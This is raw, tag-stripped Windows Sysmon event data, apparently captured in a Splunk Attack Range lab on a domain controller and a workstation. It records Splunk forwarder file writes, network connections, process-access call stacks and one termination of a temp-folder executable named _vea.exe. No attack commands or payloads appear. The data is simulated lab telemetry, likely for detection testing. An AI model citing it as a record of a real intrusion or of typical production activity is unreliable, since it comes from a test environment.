Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AE095E8B5AA791B55856C0DC5227B70,SHA256=C014D5A9F13DC72B7A2575F0061361A81F27B1D6EF47FF3A86D229EE213F72AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221131Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:21.017{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B9AB801CAA29068C086CF67717D6B03,SHA256=3A2C2F62803973DC0AA920FE37508F52FE7202674467ECA1689FEF35AC24D9FA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:18.672{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49435-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000297280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1748-6216-2707-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1748-6216-2707-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000297275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.997{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1748-6216-2707-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:20.999{C8EA50B7-1748-6216-2707-000000003802}6856C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:22.297{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A51C2123A3A505881A5F07B1C8C458D0,SHA256=8A22EF71E1902CDF6C5D842460E6F55FC38790E472B5FAFD3C118C31B252910E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221133Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:20.515{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51630-false10.0.1.12-8000- 23542300x8000000000000000221132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:22.033{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE5C13CC992D4DE272EE13AAA9EBBDBE,SHA256=A2139D55B14588CB125CCD159F0E4B4C59C80D1B49CFCEB84CE72A708349C596,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:23.315{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4A21D14F0A389040DB44FA76465584E,SHA256=4D1A98EAFC4680161365D630CA1BC9A8EAA9CB68DD0E2590EABC4DA8E369FCDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:23.049{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74836CA34519153477C78201E4D2B017,SHA256=8B068068E726C8F243D31E2F47346BCFEC9FC33EA70FBAED20D7BBA472C99BEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:24.349{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40E14CE5A698277AED8E9E897899159F,SHA256=8B7EB38F083E9D2DA650033679E52DC419713E9B4675989E603B806BEF9BC6C9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221135Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:24.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=53DDD77102AAC5EE742BB869311A085A,SHA256=2CD786E9BF06C02A104CF63726A20FF93B4C53DC26DBAD413AF81626846DF47E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221136Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:25.299{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F67DE92A77F1DB59AEC8934309C4B3D,SHA256=E71A248185675FECACB4F0324C4BD507F98C6D41C2897A631F10C47BCDC54761,IMPHASH=00000000000000000000000000000000falsetrue 534500x8000000000000000297287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:25.932{C8EA50B7-1732-6216-1F07-000000003802}5056C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 23542300x8000000000000000297286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:25.395{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=045F5266A3279D27ACCD749DDD6DC438,SHA256=6C8E734B3D04D04519C653DDD6483DAD84A48FCD8C8BEEB454363D1FBCD3AD3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221137Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:26.314{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6EA179BC785CF102DBF4F93A9D7EAE5,SHA256=C5418B8DBE203CB5763DE03B945AADFD91856E6446C50D82519C66B4FEA4D825,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:26.417{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=375CE537392F602AC21DE73EE9A1865B,SHA256=98C8237C7C257B5B94C2848D9A7042B7CEBA1A880440469E59D224BBCCF0E9E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:26.016{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55bd0|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad 10341000x8000000000000000297289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:26.016{C8EA50B7-F2AD-6215-C000-000000003802}48564964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+556b1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9824|UNKNOWN(FFFFF8036DEEEFD8)|UNKNOWN(FFFFEA43A72A5B68)|UNKNOWN(FFFFEA43A72A5CE7)|UNKNOWN(FFFFEA43A72A0371)|UNKNOWN(FFFFEA43A72A1D3A)|UNKNOWN(FFFFEA43A729FFF6)|UNKNOWN(FFFFF8036DC06503)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5942b|C:\Windows\System32\SHELL32.dll+dac8a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000297288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:26.016{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RF9547b2.TMPMD5=C788ACA089D90F3A1A6EC3105767DB64,SHA256=342A88EE39B2F3B46C5FF775B5CA8B205D1F4E2D15CC4151DC918B0596F20C38,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221139Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:25.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51631-false10.0.1.12-8000- 23542300x8000000000000000221138Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:27.361{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8334394623CFEB280EAA56B89B14117,SHA256=CEB66BF599A02D6A9C7B0F974E0E8FC6ACB95BF87814CCCBCA5200FEA8056F74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:27.432{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C758222AFDD22B7915C670A6A61488A,SHA256=33E35C79BD693D6DC4D4FFBB3E2DB6E161C2982E632580EE05C210E808A8554B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:24.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49437-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221140Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:28.564{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BF25521684977F501BB0F1C0309B6FC,SHA256=E0AAA376ABC88D15A3B60B6602436B66EB2A7603D2E1F0CFC29D43ECDB5644ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:28.462{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4A4683673F74E29BDB0653B71C731E,SHA256=FE3B934E4E436B2094741D67D1226014CC2C621B5FB3DFC66A583BD0DE7EEE1C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221141Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:29.595{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B628D1F5560456C62A4991CA09EEE79C,SHA256=B9074BD74F7C338CC6733D640D3636883FEE5CBD47E8A017A4AB2F6EBBA2CCE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:29.477{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1026096FB3077991FD81E178538EF38C,SHA256=2BECD74E74B207094C73D00893C4CAFA77EB2FD85190E9AB8257C254D89FE6A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221143Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:30.611{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62466E820E4E18D6BC3AEA46990163BF,SHA256=A6A595D9BAA68898FAE5805C5BF311F41A23CC79C8714466007187240B4DB63D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:30.492{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20975DF67770E696761756A78E1C2CD0,SHA256=6702D89B13029F86B44D002131A32CB13B7721FFA3942B33BC455982BD8A9B6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221142Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:30.439{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=A3D0BBADBAE742114855CFDA5FDD3236,SHA256=5A2F1950BF61C476A7F74D99011EA7A442871CBC99673F3048CCC72BD0B38683,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221144Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:31.674{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=387B7924415F9995267D864BA11942D2,SHA256=0F15B1912D7963C0BED0ACA1E86B35FEB869F60EFA898359524930A251D4A58D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:31.511{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B20113209088E631A3D4C5C8912D0099,SHA256=8F64BE8D34A3620AA4264D18DBC63BAE7437988C25D66B2A04C668C49805E484,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221145Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:32.783{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=232AD98066B8625940994DD7A71A76FC,SHA256=1C72C1222EF719D403AD4FE69907B65D69AAE89477A6E5FB39F99CAC6EBF13D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:32.529{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3C5AF304C5D0985FCA12521C707AA1F,SHA256=20B879E77C215DD63CBA4966BC0F474E82B72503AD4AC30DEEFB2A2DA6FFC4CF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:15:30.534{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49439-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000221146Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:15:33.923{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program 